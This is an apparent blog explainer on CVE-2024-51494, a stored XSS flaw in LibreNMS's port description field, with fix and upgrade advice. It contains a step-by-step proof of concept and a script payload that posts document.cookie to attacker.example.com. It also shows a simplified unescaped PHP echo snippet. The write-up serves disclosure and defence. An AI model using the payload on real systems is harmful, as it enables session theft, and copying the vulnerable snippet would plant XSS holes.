CVE-2024-51494 - How a Simple XSS Flaw in LibreNMS Can Compromise Your Network

LibreNMS is a widely used open-source platform designed for network monitoring. It’s built on PHP and MySQL, using SNMP for device queries. In early 2024, a security flaw was found in LibreNMS that could let attackers inject malicious JavaScript code into your monitoring system by using a Cross-Site Scripting (XSS) attack. This flaw, tracked as CVE-2024-51494, exists on the “Port Settings” page, where the “descr” (description) parameter is not properly sanitized.

This post will walk you through the vulnerability, show you how exploit code works, and tell you how to fix your systems.

What is CVE-2024-51494?

On the “Edit Port Settings” page in LibreNMS, authenticated users—including those with basic privileges—can edit descriptions for device ports. The application fails to filter out malicious JavaScript in the descr field, which an attacker can use to inject arbitrary code. Anyone who later views the affected port settings (including admins) will have their browser execute the attack code.

Proof of Concept: Step-By-Step Exploit

If you want to see how this vulnerability works in a test environment, follow these steps. Do not use this on any system you do not own or have explicit permission to test.

Step 1: Log in as an authenticated user to LibreNMS (any user with permission to change port descriptions).

Step 2: Navigate to the device’s “Port Settings” page, and select a port to edit.

Step 3: In the “Description” or descr field, enter the following payload

<script>alert('Hacked by CVE-2024-51494!');</script>

Step 4: Save the port settings.

Step 5: When any user (including an administrator) later visits the same “Port Settings” page for this port, the browser will trigger the alert.

See Example

!LibreNMS Port Settings XSS Example

A real attacker could also steal cookies or escalate privileges. For example

<script>
fetch('https://attacker.example.com/steal?';, {
  method: 'POST',
  body: document.cookie
});
</script>

Technical Deep Dive

Root Cause:
The application simply echoes the descr parameter into the HTML page without escaping or stripping HTML tags, allowing scripts to be inserted.

Vulnerable code snippet (simplified)

// Vulnerable: port settings update in LibreNMS
$descr = $_POST['descr'];
// ... other code ...
echo "<td>$descr</td>";

What Should Have Happened:

The value should be sanitized, for example

// Secure: escape HTML special characters
$descr = htmlspecialchars($_POST['descr'], ENT_QUOTES, 'UTF-8');

References

- NVD entry for CVE-2024-51494
- LibreNMS Security Advisories *(replace with official URL when available)*
- LibreNMS 24.10. Release Notes *(for the patch)*

Update LibreNMS to 24.10. or newer.

- See Upgrade Guide

Conclusion

CVE-2024-51494 is a classic example of how a small web coding mistake can expose entire management platforms to serious attacks. If your organization runs LibreNMS, updating now is critical. Always sanitize inputs, even for authenticated users, to keep your network safe.

Stay informed, stay secure!

*If you want to stay updated on the latest vulnerabilities, monitor:*
- Official LibreNMS GitHub
- NVD: National Vulnerability Database

Timeline

Published on: 11/15/2024 16:15:37 UTC
Last modified on: 11/20/2024 14:40:56 UTC